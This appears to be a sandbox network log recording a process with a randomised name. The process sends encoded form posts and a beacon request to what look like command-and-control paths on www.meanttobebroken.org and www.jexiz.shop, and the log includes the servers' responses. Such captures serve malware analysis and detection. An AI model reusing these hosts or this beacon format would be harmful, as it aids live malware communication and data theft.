Oct 31, 2024 10:25:45.838867903 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:25:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8db299807a8ae7bf-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED] Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(\|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
Oct 31, 2024 10:25:45.839035034 CET	212	IN	Data Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'
Oct 31, 2024 10:25:45.839046001 CET	1236	IN	Data Raw: 1c 17 23 e3 62 66 fc a0 38 dc 4b a3 bb 9c ab 34 08 e4 16 c3 32 7e d0 90 dd af 33 e3 07 e0 61 74 8d bf 93 c1 67 2a 09 74 d2 b8 82 57 97 9c 5e 4d c8 40 68 e0 31 4f 1f 01 36 2c 43 69 dd ad d3 d6 32 62 a2 75 a5 2c 37 ba 86 61 19 05 03 db 50 9c fe 18 Data Ascii: #bf8K42~3atg*tW^M@h1O6,Ci2bu,7aPyB]%h.l$+R,#2L(ZHNdn-1ScI!1f4'Vu>Gj8saF'z8UAEaraMg,?v
Oct 31, 2024 10:25:45.839473963 CET	1236	IN	Data Raw: 97 be 52 6d ad 4c 4e 8b 9c 38 4e d3 79 43 09 7b 94 9b 33 90 79 6b 14 1d 1f d7 f5 6d 04 4a 3d d0 97 df 7f 39 3e fe f2 fb 2f a5 f7 7d 52 b2 ab c6 3a e8 b7 29 1b 98 2b 73 1b 05 13 f2 23 11 02 27 a4 61 bc 1e 3a 92 7d 56 53 6e c3 7c 6d 34 8c d7 5f 37 Data Ascii: RmLN8NyC{3ykmJ=9>/}R:)+s#'a:}VSn\|m4_7faaZUT972i+w5D{psoh5D`n_q;,NaFrr3cK6 +CVasbxC>9"o!1.m=>^t8
Oct 31, 2024 10:25:45.839484930 CET	1236	IN	Data Raw: 6d b5 da 26 6a 2f 98 7b a7 96 67 75 82 bd 7d 34 1e 8b db 3d 54 6c 5a be 1f ac 54 3c 3f 87 a4 e0 9f 07 2b ce 9d b6 75 76 06 d1 fa 18 6b 95 2b 59 44 1e c9 06 8a 6f 4b f1 5e f1 3d 0b 54 7a 0a fc 0a 63 18 ef ce a9 e5 9f 3d 1a 98 24 05 7f a4 11 34 09 Data Ascii: m&j/{gu}4=TlZT<?+uvk+YDoK^=Tzc=$4(JM5~e4\|i~\|c-\pv,/vApE.X+x&<"i84HtH"GE94vy]vNZwv:G*
Oct 31, 2024 10:25:45.840213060 CET	1236	IN	Data Raw: 87 dd d7 d7 29 4b 98 50 50 07 7d bc c7 40 1a a5 bb b1 8c 18 17 7d 9a 25 fb 38 ff 96 d8 d6 f5 82 6e 26 07 03 1b e4 b0 ed 29 81 da 71 55 6a 88 70 ba ac 7e be 64 e8 ed aa fa 79 9b 1a b6 0d 54 c1 f6 58 eb 23 0a 9c 6f 57 da 8e 61 a9 0d 26 ea bb 00 59 Data Ascii: )KPP}@}%8n&)qUjp~dyTX#oWa&YopGt$,+`PQrD%o>IC{LV)Gq5rW_YVck74\|n]-? HYXR4gVYV]N]?A3p~JU;55RuWb$J(d
Oct 31, 2024 10:25:45.840225935 CET	8	IN	Data Raw: 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49893	141.193.213.10	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:25:47.691330910 CET	757	OUT	POST /9g6s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.meanttobebroken.org Origin: http://www.meanttobebroken.org Referer: http://www.meanttobebroken.org/9g6s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 63 42 61 4f 30 42 54 4e 57 43 7a 75 34 4c 68 68 33 76 30 55 4f 34 7a 71 61 5a 68 34 34 71 4f 68 65 73 4c 66 67 6b 71 5a 46 4b 41 48 49 68 43 6b 4d 47 65 75 39 52 65 63 79 4f 58 4f 56 61 35 70 6d 33 55 6a 66 63 4c 4f 34 34 79 5a 49 39 39 54 74 32 36 5a 73 42 71 32 49 56 4b 65 50 61 6e 4c 36 79 71 64 68 6c 32 6e 70 4e 6c 33 61 37 30 58 6e 4c 5a 63 32 61 38 72 2b 62 6b 31 4b 46 75 61 44 5a 51 36 73 44 75 30 55 45 49 2f 4c 4d 63 77 64 6a 53 42 42 6e 68 6f 64 62 33 6f 52 52 71 61 54 43 71 4d 64 73 72 64 59 58 78 64 56 73 75 63 49 78 58 30 49 77 66 53 74 52 54 78 4d 34 71 35 59 79 68 65 45 36 7a 54 54 78 56 50 4b 79 67 Data Ascii: 1Zgl=o9/euJtDoA2P3cBaO0BTNWCzu4Lhh3v0UO4zqaZh44qOhesLfgkqZFKAHIhCkMGeu9RecyOXOVa5pm3UjfcLO44yZI99Tt26ZsBq2IVKePanL6yqdhl2npNl3a70XnLZc2a8r+bk1KFuaDZQ6sDu0UEI/LMcwdjSBBnhodb3oRRqaTCqMdsrdYXxdVsucIxX0IwfStRTxM4q5YyheE6zTTxVPKyg
Oct 31, 2024 10:25:48.385827065 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:25:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8db2999068662d29-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 36 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED] Data Ascii: 16e5<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(\|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
Oct 31, 2024 10:25:48.385996103 CET	1236	IN	Data Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
Oct 31, 2024 10:25:48.386008024 CET	1236	IN	Data Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a Data Ascii: 'X'9.F472*qx_>\+K_uDZW\|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
Oct 31, 2024 10:25:48.386646986 CET	1236	IN	Data Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95 Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
Oct 31, 2024 10:25:48.386658907 CET	1236	IN	Data Raw: ce bc b5 c1 bc 04 da e4 bf aa 4c 5b 14 8f e1 82 ea 72 2c 77 9f b2 b2 49 61 43 a9 a8 2a 28 ab 10 7b 1f 53 f9 e5 f7 0f f5 45 6e f1 5a 91 db ef 9f 7f da 87 d1 7d 96 f2 22 72 8a 51 f1 86 8b 58 d7 af b9 fa d3 0e 87 87 7d 75 f1 53 56 ab 12 ce 19 6f 79 Data Ascii: L[r,wIaC*({SEnZ}"rQX}uSVoy-4R7(V46">r,j}qC14<H_Ccq+hJ;qLr#-E]uzC~LP#0Uu`;D5([@)KPP}@}%8
Oct 31, 2024 10:25:48.387350082 CET	225	IN	Data Raw: 46 38 87 fc 81 de 32 cc e3 12 e8 1d 2b a6 1c b6 b0 e8 38 62 c5 b4 87 02 2f 68 a1 87 e0 0e fa 31 4d 91 82 14 08 ce ef f8 1d 81 b5 76 b1 69 35 9d 6e d4 e3 32 ff af a6 07 65 46 9a 0f 59 f9 35 2e 57 9b b4 4c fe 8b 24 af b7 ea 2b b4 57 6a b5 af b7 bc Data Ascii: F82+8b/h1Mvi5n2eFY5.WL$+Wj)`fyJ<vR})nmP?TOg48(% \|y\|'~lU\|t ;UM6]8Q9a7S0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49910	141.193.213.10	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:25:50.241035938 CET	1774	OUT	POST /9g6s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.meanttobebroken.org Origin: http://www.meanttobebroken.org Referer: http://www.meanttobebroken.org/9g6s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 63 42 61 4f 30 42 54 4e 57 43 7a 75 34 4c 68 68 33 76 30 55 4f 34 7a 71 61 5a 68 34 34 69 4f 69 74 6b 4c 51 68 6b 71 59 46 4b 41 4c 6f 67 6c 6b 4d 47 48 75 39 4a 67 63 79 43 68 4f 51 65 35 6f 45 76 55 6b 74 34 4c 45 34 34 79 55 6f 39 2b 4d 39 33 67 5a 73 52 75 32 4a 6c 4b 65 50 61 6e 4c 35 71 71 4e 44 4e 32 68 70 4e 6d 6a 4b 37 47 63 48 4c 6c 63 31 72 42 72 2b 4f 5a 31 36 6c 75 61 6a 4a 51 34 61 2f 75 37 55 45 4b 2b 4c 4d 36 77 64 66 64 42 42 53 51 6f 63 76 4e 6f 54 42 71 5a 6c 33 31 56 66 38 42 42 2b 48 55 57 6d 67 4b 4e 73 6f 78 31 65 6f 55 49 2f 4a 55 31 65 67 41 34 4f 65 57 4e 6c 7a 71 4f 58 64 75 41 65 50 58 78 46 52 53 61 79 56 73 59 6b 55 54 68 31 37 6f 6d 6d 76 52 75 53 2f 6d 2f 61 2f 58 33 77 66 46 4c 49 61 73 7a 47 72 6a 42 4b 35 30 48 78 44 71 4d 36 2b 37 59 50 4d 69 64 50 37 6a 74 35 67 59 75 48 31 42 32 33 52 31 75 6c 51 4a 65 74 37 55 4f 6c 54 51 53 75 70 50 4d 38 77 37 45 36 2b 76 52 6a 2b 5a 72 37 2f 39 6a 61 72 55 37 49 7a 32 62 [TRUNCATED] Data Ascii: 1Zgl=o9/euJtDoA2P3cBaO0BTNWCzu4Lhh3v0UO4zqaZh44iOitkLQhkqYFKALoglkMGHu9JgcyChOQe5oEvUkt4LE44yUo9+M93gZsRu2JlKePanL5qqNDN2hpNmjK7GcHLlc1rBr+OZ16luajJQ4a/u7UEK+LM6wdfdBBSQocvNoTBqZl31Vf8BB+HUWmgKNsox1eoUI/JU1egA4OeWNlzqOXduAePXxFRSayVsYkUTh17ommvRuS/m/a/X3wfFLIaszGrjBK50HxDqM6+7YPMidP7jt5gYuH1B23R1ulQJet7UOlTQSupPM8w7E6+vRj+Zr7/9jarU7Iz2b4FcuViMjD5LbVB5eWgUC7N9q+SKmVvNUjLqN1W1NRna5CwFDxUx38uaaNF3+Wwt1iFMEh3vRsWzCWqrH0WffL6S9OkRTgUoMBLQArw8ZIalo8DZnGkagdLSB9kwz5v0ZuOadj1rP/hxMnj8+R1itCXQjgXxxcThn1sIaQ/SFOMC4AkEQ6GoI2bGojZ6bwUiA7dVWUP/W7w9Jq0hAUmhkw4mdJNuqDUeMezyedke30IKezJVrkRvMwHmASSS1u0we4qO/sgPg7b18jKl3Zzrzt0ZuONqHz5JnDywRy1DMFsAsyJSxLmSYSecZHnjsihWldZYm5eaAu7KtJwgKNomyvOboH41GbICkmSEgBGXRKr+1V1S+efyS/5YQioilDeMAcR/4RUJdKSvS11ZQxxbq/toUyecH9KLj6YCuloyS0n5kPykNvjl1LDYWSsPMzx0TyMYs/h2GCSgEkXlYEDp8opUabPQ1fjCDdA7Tj0F1UZbKNziLrHRMFaM7QbfbidxnKsTtyzyI5cuslc09MUFjOreWFifKwe2Qnf0M17Oi97CPMGkwAqWZq2tB2C4LSppWD/Q35nL4tMup+F2iWG9xT+1P2vVAl6MUtQ/Xr0+5WgBBtkbfx1QBjJoGxNTGo8KkViSBmoNaRclTQLEKgWNEyNk+qyYz3urwTW [TRUNCATED]
Oct 31, 2024 10:25:50.935794115 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:25:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8db299a049526c7f-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED] Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(\|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
Oct 31, 2024 10:25:50.936029911 CET	1236	IN	Data Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
Oct 31, 2024 10:25:50.936050892 CET	424	IN	Data Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a Data Ascii: 'X'9.F472*qx_>\+K_uDZW\|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
Oct 31, 2024 10:25:50.936417103 CET	1236	IN	Data Raw: 39 22 e6 2a e0 be ca 6f 21 f9 2a ab 31 e8 ac 82 2e ac 6d 3d 3e 5e c3 b7 74 38 1f 85 a1 04 d7 ad c3 58 05 6f f8 48 ff 06 6d b3 f7 6c 7a 47 15 08 10 d4 ca 9d 9f 3e 7d 84 6c 3c 0d 8f 7c 2b 77 38 fc f9 0e a7 e9 00 47 b7 d5 58 af 02 7a f3 07 66 5d ad Data Ascii: 9"o!1.m=>^t8XoHmlzG>}l<\|+w8GXzf]EjjD-s673GN?W>,LydZ[ fpCrG[>7iqF4KIadj!xThvxpS[.Hf`.YM-F8fnx"d=j
Oct 31, 2024 10:25:50.936431885 CET	1236	IN	Data Raw: 76 80 9c 79 5d d4 76 bc 4e 0d 88 5a 77 db 76 8e e5 98 e3 b4 8b 3a c5 bd fa ff bc b8 47 2a 83 7b 16 2a ff 73 02 73 0b 76 4c 48 d1 45 3e 9c 6e aa 1f 6d af 06 bb b5 0d 5b 8c 30 2f 56 9c bd ef e1 cc c6 12 bc 32 5e 47 b7 9b 0b 1a 10 79 68 f5 c3 37 ad Data Ascii: vy]vNZwv:G{ssvLHE>nm[0/V2^Gyh7%:SS:Pax%'i&4^x6mx7=@~Nd"K W-7%W1hNlrtNAJ;P*fGE[]\gm
Oct 31, 2024 10:25:50.937120914 CET	424	IN	Data Raw: 35 97 35 ad 9c 0a 97 52 b1 75 8f 57 fd a5 f9 17 62 14 17 1f 24 4a 19 bb 15 28 a5 b7 aa 64 1f de aa 47 13 2c ca d2 7d 2c 91 84 b7 91 e1 83 00 a0 bb 83 3e e2 e9 80 20 c9 a7 08 de d4 66 43 f5 f5 02 48 9b 02 0d 48 ca 26 88 71 84 91 2e f9 7e d3 77 0b Data Ascii: 55RuWb$J(dG,},> fCHH&q.~w-Ax8{9bqh@uhaeGT&^^U\VBV<*sC2J@E#2biLxXISZjB(?"U\6d%Hn`8!_P0NI
Oct 31, 2024 10:25:50.937139034 CET	608	IN	Data Raw: 23 14 a2 45 0d 4b e5 2b 30 6f a7 1f e2 06 da 22 b1 d9 3b 3c 58 d6 42 b2 5c cb f3 6e 04 c7 37 9a fe 01 1d a2 c6 92 83 a3 45 14 5f 57 2d 5a 48 12 7f 80 cf a5 a0 6f ba 34 0f 1d 85 21 3a 39 41 9a c4 c1 52 aa 65 ee 81 59 09 85 2a 21 ad 68 aa a7 5a 7a Data Ascii: #EK+0o";<XB\n7E_W-ZHo4!:9AReY!hZzP;22$yDX/V22E)d9\|dD&#1k(+90FpC"SJ^e]Vu/Gjx,40v+'`*85vc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49925	141.193.213.10	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:25:52.862895966 CET	464	OUT	GET /9g6s/?1Zgl=l/X+t9hb8CWGjOR1O2ZzXFDzhtuUnyzAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvHeg0TpQiQ+GxS8ts4a8QVaH5DaPjZQFNvIogjfSTI3KXDA==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.meanttobebroken.org User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:25:53.482410908 CET	655	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 31 Oct 2024 09:25:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Redirect-By: WordPress Location: http://meanttobebroken.org/9g6s/?1Zgl=l/X+t9hb8CWGjOR1O2ZzXFDzhtuUnyzAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvHeg0TpQiQ+GxS8ts4a8QVaH5DaPjZQFNvIogjfSTI3KXDA==&w6=2vdPP X-Cacheable: non200 Cache-Control: max-age=600, must-revalidate X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8db299b0591b6c01-DFW alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49957	8.210.3.99	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:25:58.585797071 CET	710	OUT	POST /li8d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.jexiz.shop Origin: http://www.jexiz.shop Referer: http://www.jexiz.shop/li8d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 68 6b 57 52 73 56 78 65 46 66 74 73 70 63 6f 57 66 70 6d 2f 48 4d 72 73 58 44 41 65 4e 32 4c 74 67 50 57 5a 2b 64 49 56 4b 65 2b 59 4e 4a 6f 70 7a 4a 63 65 6d 71 31 5a 59 4b 7a 55 76 77 61 4f 32 43 54 44 75 30 61 6a 4e 6d 74 71 33 4c 33 56 6d 47 76 70 74 4f 63 7a 54 35 65 77 51 36 30 50 61 51 45 4f 64 2b 63 37 52 59 65 2f 53 43 79 52 38 78 58 4f 67 32 46 6a 31 42 6e 71 4d 65 39 55 51 4a 6d 6d 47 38 66 70 59 2b 32 4a 58 69 6b 4d 6e 75 73 73 51 41 72 69 52 4b 30 4f 5a 6c 73 74 49 46 69 78 4f 43 77 47 73 51 51 52 66 2f 47 73 45 33 6d 4f 59 6b 77 4d 58 62 57 32 73 4a 67 65 73 59 4a 68 6b 63 55 3d Data Ascii: 